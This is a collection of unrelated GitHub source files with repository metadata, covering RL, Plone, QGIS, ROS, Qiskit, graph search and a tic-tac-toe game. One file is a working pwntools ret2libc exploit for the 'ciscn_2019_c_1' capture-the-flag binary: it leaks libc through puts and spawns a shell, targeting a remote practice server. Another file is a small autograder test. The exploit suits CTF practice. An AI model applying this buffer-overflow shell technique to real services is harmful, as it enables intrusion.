self.sim = PhysicsSim(init_pose, init_velocities, init_angle_velocities, runtime)
self.action_repeat = 3
self.state_size = self.action_repeat * 6
self.action_low = 0
self.action_high = 900
self.action_size = 4
# Goal
self.target_pos = target_pos if target_pos is not None else np.array([0., 0., 100.])
def get_reward(self):
reward = np.tanh(1 - 0.0005*(abs(self.sim.pose[:3] - self.target_pos)).sum()) # From 0.001
return reward
def step(self, rotor_speeds):
reward = 0
pose_all = []
for _ in range(self.action_repeat):
done = self.sim.next_timestep(rotor_speeds) # update the sim pose and velocities
reward += self.get_reward()
pose_all.append(self.sim.pose)
next_state = np.concatenate(pose_all)
return next_state, reward, done
def reset(self):
self.sim.reset()
state = np.concatenate([self.sim.pose] * self.action_repeat)
return state
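# --- Added usage sketch (assumption: tasks/physics_sim.py from this repo is
# importable as above, so the calls stay commented):
# task = Task(init_pose=np.array([0., 0., 10., 0., 0., 0.]),
#             target_pos=np.array([0., 0., 100.]))
# state = task.reset()                        # shape (18,): action_repeat * 6
# next_state, reward, done = task.step(np.array([450.] * 4))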
|
[
"noreply@github.com"
] |
jrana1218.noreply@github.com
|
a3b85fab4392d4e726ea568ded7cfd814bdb69b7
|
4d5c46535be740c8d41bc0e711c752a4cff2a76b
|
/plonetheme/ewb_case/browser/viewlets.py
|
ff363c9e3be1a5ca0b67b06d5209e5a8337af044
|
[
"CC-BY-3.0"
] |
permissive
|
ewb-case/plonetheme.ewb_case
|
018a2eb0377fb80373d5aab1b6547ef5c8bd5789
|
391582be4b39838e5b769870a5e4ae3ae540f51a
|
refs/heads/master
| 2020-12-25T19:14:40.733234
| 2012-02-06T17:08:35
| 2012-02-06T17:08:35
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,140
|
py
|
from zope.component import getMultiAdapter
from Acquisition import aq_inner
from Products.Five.browser.pagetemplatefile import ViewPageTemplateFile
from plone.app.layout.viewlets.common import GlobalSectionsViewlet
from plonetheme.ewb_case.util import getSecondaryNavLabel
class PrimarySectionsViewlet(GlobalSectionsViewlet):
"""Viewlet for the primary navigation tabs.
"""
index = ViewPageTemplateFile('templates/sections.pt')
class SecondarySectionsViewlet(GlobalSectionsViewlet):
"""Viewlet for secondary navigation tabs.
"""
index = ViewPageTemplateFile('templates/labeled_sections.pt')
def update(self):
context = aq_inner(self.context)
portal_tabs_view = getMultiAdapter((context, self.request),
name='plonetheme.ewb_case.secondary_tabs_view')
self.portal_tabs = portal_tabs_view.topLevelTabs()
self.selected_tabs = self.selectedTabs(portal_tabs=self.portal_tabs)
self.selected_portal_tab = self.selected_tabs['portal']
self.sections_label = getSecondaryNavLabel(context)
|
[
"mattbierner@gmail.com"
] |
mattbierner@gmail.com
|
74d367ab4183f437bed2c594c315120d6baee7bb
|
959e69ec7b0246063ce5063414065a3960c9b912
|
/BACKEND/project/maria/Participant.py
|
3f3a79ec9f8a5bbe915ba3dce13456b80976a675
|
[] |
no_license
|
Atom02/increaseseminar
|
5e8fcdfdec0a55e4e3aef8591e17dfcedcbfcfab
|
5da51dfe7f76af6999337d5bf476dd813693e60c
|
refs/heads/main
| 2023-08-22T03:39:58.350150
| 2021-10-15T02:18:05
| 2021-10-15T02:18:05
| 344,347,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 600
|
py
|
from project import mariadb
class Participant(mariadb.Model):
id = mariadb.Column('id', mariadb.Integer, primary_key=True, autoincrement=True)
email = mariadb.Column('email', mariadb.String(255), unique=True, nullable=False)
name = mariadb.Column('name',mariadb.String(255), nullable=False)
affiliation = mariadb.Column('affiliation', mariadb.String(500), nullable=False)
uniqueURL = mariadb.Column('url_key', mariadb.String(500), unique=True, nullable=False)
country_id = mariadb.Column('country_id', mariadb.Integer, mariadb.ForeignKey('countrydb.id', ondelete='SET NULL'))
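# --- Added usage sketch (assumption: run inside the Flask app context that
# configures `mariadb` in the `project` package, so it stays commented):
# p = Participant(email='ada@example.com', name='Ada Lovelace',
#                 affiliation='Example University', uniqueURL='a1b2c3')
# mariadb.session.add(p)
# mariadb.session.commit()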
|
[
"candra.nurihsan9@gmail.com"
] |
candra.nurihsan9@gmail.com
|
94a77bf8a110b7ad909898141c77ad5a398f26f8
|
3b2b0c3edc800bfda49e58402bdf60dd42138615
|
/ciscn_2019_c/ciscn_2019_c_1/exp.py
|
cd4e6c81f6a5a619903fa2ecd44ef84e92c5c102
|
[] |
no_license
|
xmoct/Buuoj-Pwn
|
e3672ba1c1a914754596a7fb29384874b54683db
|
2425fa697e7ba0bd8a72eeb0e9b4ef07f89c9e17
|
refs/heads/main
| 2023-06-26T05:17:57.942639
| 2021-07-15T01:47:12
| 2021-07-15T01:59:24
| 386,145,955
| 1
| 0
| null | 2021-07-15T03:09:28
| 2021-07-15T03:09:28
| null |
UTF-8
|
Python
| false
| false
| 895
|
py
|
import sys
from pwn import *
context.log_level='debug'
#context.arch='amd64'
if len(sys.argv)==1 :
io=process('./ciscn_2019_c_1')
elf=ELF('./ciscn_2019_c_1')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else :
io=remote('node3.buuoj.cn',26267)
elf=ELF('./ciscn_2019_c_1')
libc=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
pop_rdi_addr=0x400c83
pay='\x00'*0x58+p64(pop_rdi_addr)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(elf.sym['main'])
io.recv()
io.sendline('1')
io.recv()
io.sendline(pay)
io.recv(0xc)
puts_addr=u64(io.recv(6)+'\x00\x00')
success('puts_addr:'+hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
success('libc_base'+hex(libc_base))
pay='\x00'*0x58+p64(pop_rdi_addr)+p64(libc_base+libc.search('/bin/sh\x00').next())+p64(libc_base+libc.sym['system'])+p64(elf.sym['main'])
io.recv()
io.sendline('1')
io.recv()
io.sendline(pay)
# gdb.attach(io)
# pause()
io.interactive()
|
[
"ilovekeer@users.noreply.github.com"
] |
ilovekeer@users.noreply.github.com
|
8522643b85ce02948fca10a4a2bffc35cf079cab
|
7dfdd1323f2e1278b6be7a2edd8aeb5508a5428a
|
/hw/hw2/tests/q2a.py
|
461af0d56e5e98498e5be691a81e9e44b1e6d4f4
|
[] |
no_license
|
DS-100/su21
|
4f1932d57b92f488f359be667a5ec79a4702f60e
|
e62a80452d546722fbea2651e27e3bf276ce5453
|
refs/heads/main
| 2023-07-10T23:28:37.918626
| 2021-08-05T20:51:09
| 2021-08-05T20:51:09
| 375,925,180
| 4
| 6
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
test = { 'name': 'q2a',
'points': 1,
'suites': [ { 'cases': [ { 'code': '>>> assert prob_at_most(3, 0.4, 1) >= 0;\n>>> assert prob_at_most(5, 0.6, 3) <= 1;\n>>> assert prob_at_most(2, 3, 4) == 0\n',
'hidden': False,
'locked': False}],
'scored': True,
'setup': '',
'teardown': '',
'type': 'doctest'}]}
|
[
"57054493+rohilkanwar@users.noreply.github.com"
] |
57054493+rohilkanwar@users.noreply.github.com
|
d96501f1b72e6d5fd13ba40b2f5ae1f6aaf256c2
|
e6d0bbc56932580f8e4be99fac6241e040ba5be7
|
/src/inAll.py
|
d352d073c99127b3d22c99099f955e33dbd36dcb
|
[] |
no_license
|
Parkat13/diploma
|
8e990b55054e2171c72cf701b2631c814cd3630e
|
5ea970210f7ec567bb3caec629ba490cb31575f3
|
refs/heads/master
| 2018-10-01T05:06:00.352595
| 2018-06-08T00:31:07
| 2018-06-08T00:31:07
| 115,097,721
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,839
|
py
|
# -*- coding: utf-8 -*-
import sys
import codecs
reload(sys)
sys.setdefaultencoding('utf-8')
f1 = codecs.open('TUpdateRangMI.txt', 'r', 'utf8')
f2 = codecs.open('TUpdateRangAugmentedMI.txt', 'r', 'utf8')
f3 = codecs.open('TUpdateRangNormalizedMI.txt', 'r', 'utf8')
f4 = codecs.open('TUpdateRangTrueMI.txt', 'r', 'utf8')
f5 = codecs.open('TUpdateRangCubicMI.txt', 'r', 'utf8')
f6 = codecs.open('TUpdateRangT-Score.txt', 'r', 'utf8')
f7 = codecs.open('TUpdateRangDC.txt', 'r', 'utf8')
f8 = codecs.open('TUpdateRangModifiedDC.txt', 'r', 'utf8')
f9 = codecs.open('TUpdateRangChi-Square.txt', 'r', 'utf8')
f10 = codecs.open('TUpdateRangLLR.txt', 'r', 'utf8')
f11 = codecs.open('TUpdateRangWord2vec.txt','r','utf8')
f12 = codecs.open('TUpdateRangWordsWord2vec.txt','r','utf8')
f13 = codecs.open('TUpdateRangC-Value.txt','r','utf8')
f14 = codecs.open('TUpdateRangSinonim.txt','r','utf8')
f_res = open('TUpdateRang.txt', 'w')
dict = {}
dict_met = {}
for f in [f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12, f13, f14]:
a = f.read().split()
for i in range(len(a)/4):
if (a[i*4] + ' ' + a[i*4 + 1]) in dict:
            if dict[a[i*4] + ' ' + a[i*4 + 1]] > float(a[i*4 + 2]):  # differs for T and N
dict[a[i*4] + ' ' + a[i*4 + 1]] = float(a[i*4 + 2])
dict_met[a[i*4] + ' ' + a[i*4 + 1]] = a[i*4 + 3]
else:
dict[a[i*4] + ' ' + a[i*4 + 1]] = float(a[i*4 + 2])
dict_met[a[i*4] + ' ' + a[i*4 + 1]] = a[i*4 + 3]
for i in sorted(dict, key=dict.__getitem__, reverse=False):  # differs for T and N
f_res.write(str(i) + ' ' + str(int(dict[i])) + ' ' + dict_met[i] + '\n')
f_res.close()
f1.close()
f2.close()
f3.close()
f4.close()
f5.close()
f6.close()
f7.close()
f8.close()
f9.close()
f10.close()
f11.close()
f12.close()
f13.close()
f14.close()
|
[
"noreply@github.com"
] |
Parkat13.noreply@github.com
|
0e90a272fd779328441e48a2bb4a3f1d546a7a7d
|
7b4fe32969c7cc2e1b709ab7a2e91ccca736ac5a
|
/sat_imagery_manager.py
|
b154d6f5d5d25a04cba6f1bc4546f297496a9ef2
|
[] |
no_license
|
bentrm/sat-imagery-manager
|
202e37037205b544f397e34ce7b7c3d550d7eaa3
|
f98279000c47874eda680d3de9867b5977945993
|
refs/heads/master
| 2020-03-10T14:03:31.968784
| 2018-04-14T14:28:45
| 2018-04-14T14:28:45
| 129,416,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,072
|
py
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
SatelliteImageryManager
A QGIS plugin
 A plugin that allows selectively loading sat imagery.
-------------------
begin : 2018-04-14
git sha : $Format:%H$
copyright : (C) 2018 by Benjamin Thurm
email : bentrm@posteo.de
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import QSettings, QTranslator, qVersion, QCoreApplication, Qt
from PyQt4.QtGui import QAction, QIcon
# Initialize Qt resources from file resources.py
import resources
# Import the code for the DockWidget
from sat_imagery_manager_dockwidget import SatelliteImageryManagerDockWidget
import os.path
class SatelliteImageryManager:
"""QGIS Plugin Implementation."""
def __init__(self, iface):
"""Constructor.
:param iface: An interface instance that will be passed to this class
which provides the hook by which you can manipulate the QGIS
application at run time.
:type iface: QgisInterface
"""
# Save reference to the QGIS interface
self.iface = iface
# initialize plugin directory
self.plugin_dir = os.path.dirname(__file__)
# initialize locale
locale = QSettings().value('locale/userLocale')[0:2]
locale_path = os.path.join(
self.plugin_dir,
'i18n',
'SatelliteImageryManager_{}.qm'.format(locale))
if os.path.exists(locale_path):
self.translator = QTranslator()
self.translator.load(locale_path)
if qVersion() > '4.3.3':
QCoreApplication.installTranslator(self.translator)
# Declare instance attributes
self.actions = []
self.menu = self.tr(u'&Satellite imagery')
# TODO: We are going to let the user set this up in a future iteration
self.toolbar = self.iface.addToolBar(u'SatelliteImageryManager')
self.toolbar.setObjectName(u'SatelliteImageryManager')
#print "** INITIALIZING SatelliteImageryManager"
self.pluginIsActive = False
self.dockwidget = None
# noinspection PyMethodMayBeStatic
def tr(self, message):
"""Get the translation for a string using Qt translation API.
We implement this ourselves since we do not inherit QObject.
:param message: String for translation.
:type message: str, QString
:returns: Translated version of message.
:rtype: QString
"""
# noinspection PyTypeChecker,PyArgumentList,PyCallByClass
return QCoreApplication.translate('SatelliteImageryManager', message)
def add_action(
self,
icon_path,
text,
callback,
enabled_flag=True,
add_to_menu=True,
add_to_toolbar=True,
status_tip=None,
whats_this=None,
parent=None):
"""Add a toolbar icon to the toolbar.
:param icon_path: Path to the icon for this action. Can be a resource
path (e.g. ':/plugins/foo/bar.png') or a normal file system path.
:type icon_path: str
:param text: Text that should be shown in menu items for this action.
:type text: str
:param callback: Function to be called when the action is triggered.
:type callback: function
:param enabled_flag: A flag indicating if the action should be enabled
by default. Defaults to True.
:type enabled_flag: bool
:param add_to_menu: Flag indicating whether the action should also
be added to the menu. Defaults to True.
:type add_to_menu: bool
:param add_to_toolbar: Flag indicating whether the action should also
be added to the toolbar. Defaults to True.
:type add_to_toolbar: bool
:param status_tip: Optional text to show in a popup when mouse pointer
hovers over the action.
:type status_tip: str
:param parent: Parent widget for the new action. Defaults None.
:type parent: QWidget
:param whats_this: Optional text to show in the status bar when the
mouse pointer hovers over the action.
:returns: The action that was created. Note that the action is also
added to self.actions list.
:rtype: QAction
"""
icon = QIcon(icon_path)
action = QAction(icon, text, parent)
action.triggered.connect(callback)
action.setEnabled(enabled_flag)
if status_tip is not None:
action.setStatusTip(status_tip)
if whats_this is not None:
action.setWhatsThis(whats_this)
if add_to_toolbar:
self.toolbar.addAction(action)
if add_to_menu:
self.iface.addPluginToRasterMenu(
self.menu,
action)
self.actions.append(action)
return action
def initGui(self):
"""Create the menu entries and toolbar icons inside the QGIS GUI."""
icon_path = ':/plugins/SatelliteImageryManager/icon.png'
self.add_action(
icon_path,
text=self.tr(u'Satellite Imagery Manager'),
callback=self.run,
parent=self.iface.mainWindow())
#--------------------------------------------------------------------------
def onClosePlugin(self):
"""Cleanup necessary items here when plugin dockwidget is closed"""
#print "** CLOSING SatelliteImageryManager"
# disconnects
self.dockwidget.closingPlugin.disconnect(self.onClosePlugin)
# remove this statement if dockwidget is to remain
# for reuse if plugin is reopened
        # Commented next statement since it causes QGIS crashes
# when closing the docked window:
# self.dockwidget = None
self.pluginIsActive = False
def unload(self):
"""Removes the plugin menu item and icon from QGIS GUI."""
#print "** UNLOAD SatelliteImageryManager"
for action in self.actions:
self.iface.removePluginRasterMenu(
self.tr(u'&Satellite imagery'),
action)
self.iface.removeToolBarIcon(action)
# remove the toolbar
del self.toolbar
#--------------------------------------------------------------------------
def run(self):
"""Run method that loads and starts the plugin"""
if not self.pluginIsActive:
self.pluginIsActive = True
#print "** STARTING SatelliteImageryManager"
# dockwidget may not exist if:
# first run of plugin
# removed on close (see self.onClosePlugin method)
if self.dockwidget == None:
# Create the dockwidget (after translation) and keep reference
self.dockwidget = SatelliteImageryManagerDockWidget()
# connect to provide cleanup on closing of dockwidget
self.dockwidget.closingPlugin.connect(self.onClosePlugin)
# show the dockwidget
# TODO: fix to allow choice of dock location
self.iface.addDockWidget(Qt.RightDockWidgetArea, self.dockwidget)
self.dockwidget.show()
|
[
"bentrm@posteo.de"
] |
bentrm@posteo.de
|
b5b9a5883683982bf323739f15380c66d9818d4c
|
c6e8d81ab20b31df5821794986cafc468940f745
|
/graph_code/stephen_dfs.py
|
db0dcbbfe382eb56ca9e6c3ebedf23d4be4fde8a
|
[
"MIT"
] |
permissive
|
Mewzyk/stephen_AI
|
31722a54cfcd13691f2200db711d78283f5718d5
|
9e1cc920619581318c35959a3d888808edf6f959
|
refs/heads/master
| 2021-09-04T19:58:33.861993
| 2018-01-21T23:33:02
| 2018-01-21T23:33:02
| 115,215,282
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
"""
Recursive (call-stack) implementation of DFS
Designed to work with the graph implementation in stephen_graph.py
@Date: 23 December 2017
@Author: Stephen Thomas
"""
"""
Params ->
@start_node: node to start DFS on
@dest_node: node attempting to find a path to
Output ->
List containing visited nodes
"""
def dfs(start_node, dest_node, visited=None, path=None):
if visited is None:
visited = set()
path = []
visited.add(start_node)
path.append(start_node.key)
if start_node is dest_node: return path
for neighbor in start_node.neighbors:
if neighbor not in visited:
dfs(neighbor, dest_node, visited, path)
if dest_node.key in path: return path
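# --- Added usage sketch (assumption: a minimal stand-in for the node type in
# stephen_graph.py, of which this function only needs `key` and `neighbors`):
if __name__ == '__main__':
    class _Node(object):
        def __init__(self, key):
            self.key = key
            self.neighbors = []
    a, b, c = _Node('a'), _Node('b'), _Node('c')
    a.neighbors.extend([b, c])
    print(dfs(a, c))  # ['a', 'b', 'c'] -- the visit order, per the docstring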
|
[
"mewzyk@gmail.com"
] |
mewzyk@gmail.com
|
0aa6a6e4405e77c19691ecef94d8839727f1374f
|
c510eeda3bdc881c0bb40ac872ee969b592b7c59
|
/python project/app/jobs/jobs.py
|
8eb2da55e144aa4ace886a0747228a49da0adfd3
|
[] |
no_license
|
tansuluu/FaceRecognation
|
6e3ab828683876560a4162a5561264fe1d173f22
|
f733b2799e9cb1450e0881bd8e18f6b16356f830
|
refs/heads/master
| 2022-12-11T08:24:14.068300
| 2020-05-21T19:36:43
| 2020-05-21T19:36:43
| 243,033,678
| 0
| 0
| null | 2022-12-08T01:23:57
| 2020-02-25T15:27:04
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,038
|
py
|
import atexit
import datetime
from apscheduler.schedulers.background import BackgroundScheduler
from app.service.person_service import start_process_person
from app.service.request_service import request_process
def run_request():
from app import app, log
log("in run_request")
print("in run_request")
request_process()
print("after run_request")
def process_person():
from app import app, log
log("in process_person")
print("in process_person")
start_process_person()
print("after process_person")
def run_schedule():
from app import app, log
if not app.debug:
scheduler = BackgroundScheduler()
scheduler.add_job(run_request, 'interval', seconds=20, replace_existing=True, id='verify_new_subscribers')
scheduler.add_job(process_person, 'interval', seconds=20, replace_existing=True, id='process_person')
app.logger.info("Added jobs")
scheduler.start()
log("Started scheduler")
atexit.register(lambda: scheduler.shutdown())
|
[
"tansuluu.myrzaeva@iaau.edu.kg"
] |
tansuluu.myrzaeva@iaau.edu.kg
|
51971c3a03213d0a52e3c33361722b36b98c620a
|
356bdc3c82db97fb4d611c8ed6fa6191241685fc
|
/digit_in_integer.py
|
e8969f52ac8324ede5ac8a17b2ff51aaf7e57315
|
[] |
no_license
|
Sireesha0907/python-programs
|
f44a354ecfcf675c3386919d345d18bd390578b8
|
36939441a234aff9183a03c24e3ba0f43e4c6afc
|
refs/heads/master
| 2020-06-20T12:07:43.830643
| 2019-07-19T06:38:28
| 2019-07-19T06:38:28
| 197,117,440
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
d=abs(int(input("Enter an Integer Number :")))  # abs() so negative inputs work too
count=0
if d==0:
    count=1  # zero still has one digit
while(d>0):
    d=d//10
    count=count+1
print("The Number of Digits in Integer is: ",count)
|
[
"noreply@github.com"
] |
Sireesha0907.noreply@github.com
|
062e8edc7abc7677805a44d26f2ac8dd011881cb
|
db1a43b036048db8f19a040270658557a90b310b
|
/catkin_ws/devel/lib/python2.7/dist-packages/basics/msg/_TimerGoal.py
|
33b744bf288125d47c3fec9ba5ab39cfbce419d7
|
[] |
no_license
|
caocaomomo/hello-world
|
caa559cb172492f551c36190ef59404234b86dcc
|
8e93ca5d8bbb4b69edeee9b7982a23d06924795c
|
refs/heads/master
| 2020-03-12T03:57:05.214002
| 2018-04-21T04:49:34
| 2018-04-21T04:49:34
| 130,434,490
| 0
| 0
| null | 2018-04-21T03:15:43
| 2018-04-21T03:00:30
| null |
UTF-8
|
Python
| false
| false
| 4,073
|
py
|
# This Python file uses the following encoding: utf-8
"""autogenerated by genpy from basics/TimerGoal.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import genpy
class TimerGoal(genpy.Message):
_md5sum = "861563d4afc38bffed1a53c61a474261"
_type = "basics/TimerGoal"
_has_header = False #flag to mark the presence of a Header object
_full_text = """# ====== DO NOT MODIFY! AUTOGENERATED FROM AN ACTION DEFINITION ======
duration time_to_wait
"""
__slots__ = ['time_to_wait']
_slot_types = ['duration']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
time_to_wait
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(TimerGoal, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.time_to_wait is None:
self.time_to_wait = genpy.Duration()
else:
self.time_to_wait = genpy.Duration()
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_get_struct_2i().pack(_x.time_to_wait.secs, _x.time_to_wait.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.time_to_wait is None:
self.time_to_wait = genpy.Duration()
end = 0
_x = self
start = end
end += 8
(_x.time_to_wait.secs, _x.time_to_wait.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.time_to_wait.canon()
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_get_struct_2i().pack(_x.time_to_wait.secs, _x.time_to_wait.nsecs))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.time_to_wait is None:
self.time_to_wait = genpy.Duration()
end = 0
_x = self
start = end
end += 8
(_x.time_to_wait.secs, _x.time_to_wait.nsecs,) = _get_struct_2i().unpack(str[start:end])
self.time_to_wait.canon()
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
def _get_struct_I():
global _struct_I
return _struct_I
_struct_2i = None
def _get_struct_2i():
global _struct_2i
if _struct_2i is None:
_struct_2i = struct.Struct("<2i")
return _struct_2i
|
[
"114707550@qq.com"
] |
114707550@qq.com
|
e07f4054dcc9dc4d0fb26e7a66d83c8dcfec6da9
|
56d8c675f9be578e416edd3c702a9a10c4b97dda
|
/TicTacToe/board.py
|
d65f5c6fc3bd8056caf7083337039914c14d37a1
|
[] |
no_license
|
TimothyK/TicTacToe
|
9c1275d8789e9d320de03d8612f708e8ec88a600
|
4610b99743adeeb053868eb89cab043407b83044
|
refs/heads/master
| 2022-10-09T14:32:02.342011
| 2020-06-10T05:06:35
| 2020-06-10T05:06:35
| 271,183,732
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,943
|
py
|
'''board - Tic Tac Toe board'''
from colorama import init
from colorama import Fore, Style
class Board:
'''
Tic Tac Toe Board
'''
def __init__(self):
self.__board = [str(x) for x in list(range(1, 10))]
init()
def __row(self, row_num):
return self.__board[(row_num-1)*3:row_num*3]
def __rows(self):
return [self.__row(x) for x in range(1, 4)]
def __lines(self):
def col(col_num):
return self.__board[col_num-1:9:3]
def cols():
return [col(x) for x in range(1, 4)]
def forward_cross_line():
return [self.__board[0]] + [self.__board[4]] + [self.__board[8]]
def back_cross_line():
return [self.__board[2]] + [self.__board[4]] + [self.__board[6]]
def cross():
return [forward_cross_line(), back_cross_line()]
return self.__rows() + cols() + cross()
def print_board(self):
''' Prints the Tic Tac Toe board, with available selections '''
def add_color(marker):
#program must be run from a command line to see the colors.
if marker == 'X':
return Style.BRIGHT + Fore.YELLOW + marker + Fore.RESET + Style.RESET_ALL
if marker == 'O':
return Style.BRIGHT + Fore.GREEN + marker + Fore.RESET + Style.RESET_ALL
return marker
def print_row(row):
print(' '.join(add_color(x) for x in row))
for row in self.__rows()[::-1]:
print_row(row)
print(Fore.RESET)
def available_inputs(self):
''' Lists available selections for the player to put their mark '''
return [x for x in self.__board if x.isdigit()]
def change_cell(self, cell, player_mark):
'''
Changes a cell to the player's mark
Args:
cell (str): should be a value returned from available_inputs
player_mark (str): 'X' or 'O'
'''
pos = int(cell)-1
self.__board[pos] = player_mark
def winner(self):
'''
Returns the winner of the game 'X' or 'O'.
Returns False if there is no winner.
'''
def line_winner(line):
token = set(line)
if len(token) == 1:
return token.pop()
return False
        for line in self.__lines():
            winner = line_winner(line)
            if winner:
                return winner
return False
def is_game_over(self):
''' Reports (bool) if game has a winner or is a draw '''
return self.available_inputs() == [] or self.winner()
def print_game_result(self):
''' Prints the final result of the game, including game board '''
print()
winner = self.winner()
if not winner:
print("The game is a draw")
else:
print("The winner is player {}".format(winner))
self.print_board()
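# --- Minimal usage sketch (illustrative addition, not in the original module) ---
if __name__ == '__main__':
    board = Board()
    board.change_cell('5', 'X')          # X takes the centre square
    board.change_cell('1', 'O')
    board.print_board()
    print(board.available_inputs())      # remaining free cells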
|
[
"timothy.klenke@gmail.com"
] |
timothy.klenke@gmail.com
|
04cbeb465a02df5445972cb1bd6d360afe2e387a
|
bd6260082118b45942f319169e82ee5a2d8cc5e1
|
/qiskit/providers/qrack/backends/qasm_simulator.py
|
ca189a4f1fe5bd6113ef0b7bb4d616ce4ac70e96
|
[
"Apache-2.0"
] |
permissive
|
vm6502q/qiskit-qrack-provider
|
e73040040945507498cbc014b9331946ee373404
|
73f70fde60f0fda361a46f874e7eda2ea84038f1
|
refs/heads/master
| 2023-06-26T21:47:20.603420
| 2023-06-20T19:29:14
| 2023-06-20T19:29:14
| 186,687,718
| 1
| 1
|
Apache-2.0
| 2022-03-12T23:05:03
| 2019-05-14T19:34:28
|
Python
|
UTF-8
|
Python
| false
| false
| 37,513
|
py
|
# This code is based on and adapted from https://github.com/Qiskit/qiskit-qcgpu-provider/blob/master/qiskit_qcgpu_provider/qasm_simulator.py
#
# Adapted by Daniel Strano. Many thanks to Adam Kelly for pioneering a third-party Qiskit provider.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
# pylint: disable=invalid-name
import uuid
import time
import numpy as np
import pandas as pd
from datetime import datetime
from collections import Counter
from qiskit.providers.models import BackendConfiguration
from ..version import __version__
from ..qrackjob import QrackJob
from ..qrackerror import QrackError
from pyqrack import QrackSimulator, Pauli
from qiskit.providers.backend import BackendV1
from qiskit.result import Result
from qiskit.providers.options import Options
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumcircuit import QuantumCircuit
from qiskit.qobj.qasm_qobj import QasmQobjExperiment, QasmQobjInstruction
from qiskit.circuit.classicalregister import Clbit
class QrackQasmQobjInstructionConditional:
def __init__(self, mask, val):
self.mask = mask
self.val = val
def to_dict(self):
return vars(self)
class QrackExperimentHeader(dict):
def __init__(self, a_dict=None):
dict.__init__(self)
for key, value in a_dict.items():
self[key] = value
def to_dict(self):
return self
class QrackExperimentResultHeader:
def __init__(self, name):
self.name = name
def to_dict(self):
return vars(self)
class QrackExperimentResultData:
def __init__(self, counts, memory):
self.counts = counts
self.memory = memory
def to_dict(self):
return vars(self)
class QrackExperimentResult:
def __init__(self, shots, data, status, success, header, meta_data = None, time_taken = None):
self.shots = shots
self.data = data
self.status = status
self.success = success
self.header = header
        self.meta_data = meta_data
self.time_taken = time_taken
def to_dict(self):
return vars(self)
class QasmSimulator(BackendV1):
"""
Contains an OpenCL based backend
"""
DEFAULT_OPTIONS = {
'method': 'automatic',
'shots': 1024,
'is_schmidt_decompose_multi': True,
'is_schmidt_decompose': True,
'is_stabilizer_hybrid': True,
'is_binary_decision_tree': False,
'is_paged': True,
'is_cpu_gpu_hybrid': True,
'is_host_pointer': False,
'is_t_injected': True,
'is_reactively_separated': True
}
DEFAULT_CONFIGURATION = {
'backend_name': 'statevector_simulator',
'backend_version': __version__,
'n_qubits': 64,
'conditional': True,
'url': 'https://github.com/vm6502q/qiskit-qrack-provider',
'simulator': True,
'local': True,
'open_pulse': False,
'memory': True,
'max_shots': 65536,
'description': 'An OpenCL based qasm simulator',
'coupling_map': None,
'basis_gates': [
'id', 'u', 'u1', 'u2', 'u3', 'r', 'rx', 'ry', 'rz',
'h', 'x', 'y', 'z', 's', 'sdg', 'sx', 'sxdg', 'p', 't', 'tdg',
'cu', 'cu1', 'cu2', 'cu3', 'cx', 'cy', 'cz', 'ch', 'cp', 'csx', 'csxdg', 'dcx',
'ccx', 'ccy', 'ccz', 'mcx', 'mcy', 'mcz', 'mcu', 'mcu1', 'mcu2', 'mcu3',
'swap', 'iswap', 'cswap', 'mcswap', 'reset', 'measure', 'barrier'
],
'gates': [{
'name': 'id',
'parameters': [],
'conditional': True,
'description': 'Single-qubit identity gate',
'qasm_def': 'gate id a { U(0,0,0) a; }'
}, {
'name': 'u',
